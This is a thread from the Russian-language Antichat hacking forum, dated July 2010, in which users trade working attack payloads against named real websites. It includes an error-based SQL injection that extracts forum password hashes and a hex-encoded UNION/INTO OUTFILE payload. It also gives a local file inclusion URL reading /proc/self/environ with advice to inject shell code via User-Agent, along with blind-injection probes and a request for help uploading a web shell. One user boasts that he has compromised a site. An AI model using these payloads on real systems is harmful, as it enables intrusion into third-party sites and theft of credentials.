ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
02.07.2010, 17:28
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Сообщение от Ctacok
Ctacok said:
эм =\
спасибо, но
Сообщение от None
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
''ampersand#95;members
limit 0,1),floor(rand(0)*2))x from information_schema.tables group ' at line 1
символ "_" не пускает?
|
|
|
02.07.2010, 17:43
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от #Wolf#
#Wolf# said:
спасибо, но
символ "_" не пускает?
Странно, ведь information_schema пропустил же.
|
|
|
|
02.07.2010, 17:52
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Сообщение от Ctacok
Ctacok said:
Странно, ведь information_schema пропустил же.
да, вот что заметил, нормально могу читать все таблы, кроме тех, который начинаются на ibf_ .
Хотя структуру их я могу смотреть, а "get data" нет =(
есть мысли?
|
|
|
|
02.07.2010, 18:04
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
#Wolf#, попробуй -
Код:
Code:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
-------------------
Сообщение от CyberHunter
CyberHunter said:
Скажите как можно залить шелл через LFI?
Вот например
тут
И какие нужны права на это? Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее тут
_http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00
в User-Agent пишешь код шелла.
-------------------
Сообщение от SeNaP
SeNaP said:
как быть тут?
http://fixwap.net/ru/html/complain.php?uid=-1%20OR%2017-7=10
http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=4 -> false
http://fixwap.net/ru/html/complain.php?uid=26300+and+mid(version(),1,1)=5 -> true
|
|
|
|
02.07.2010, 18:04
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите как можно залить шелл через LFI?
Вот например тут
И какие нужны права на это? |
|
|
|
02.07.2010, 19:20
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
#Wolf#,
попробуй -
Код:
Code:
id=201255656844 and(select 1 from(select count(*),concat((select converge_pass_hash from `ibf_members_converge` limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
нет такой таблицы. версия 1.3.1
|
|
|
|
02.07.2010, 22:24
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Как правильно составить двойной запрос?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select COUNT(CODE) as count1 from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ps_sql[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn_s[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rs_s[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'count1'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]mysql_free_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_s2[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$pi_recordcount[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"select * from tbl_subkat where KATCODE="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" order by POSITION, NAZV"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$conn1[/COLOR][COLOR="#007700"]);
while (([/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$rs_2[/COLOR][COLOR="#007700"]))!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]recordcount_new[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"tbl_base where ISMODER=1 and (SUBKAT1="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT2="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" or SUBKAT3="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CODE'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]")"[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]' ('[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pi2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]')'[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
-1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f 757466696c652b5c27312e7478745c272d2d
http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b3 12b696e746f2b6f757466696c652b5c27312e7478745c272d2 d,2,version(),4-- |
|
|
|
02.07.2010, 23:18
|
|
Новичок
Регистрация: 10.06.2010
Сообщений: 1
Провел на форуме:
6274
Репутация:
0
|
|
Имеется доступ фтп к серверу (Topserver),
как узнать директорию доступную на запись (или поменять права на запись) и залить шел
если можно попобробней, а то я в этом не особо опытный!
|
|
|
|
03.07.2010, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от Farboud
Farboud said:
Имеется доступ фтп к серверу (Topserver),
как узнать директорию доступную на запись (или поменять права на запись) и залить шел
если можно попобробней, а то я в этом не особо опытный!
чет не понял...есть фтп доступ и нет прав на заливку? чет нереально
|
|
|
|
03.07.2010, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от CyberHunter
CyberHunter said:
Скажите как можно залить шелл через LFI?
Вот например
тут
И какие нужны права на это? Спасибо, классный инклуд.
Я зашеллил
Подсказка: енвирон
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2233859){kind=avatar}
Похожие темы
Линейный вид
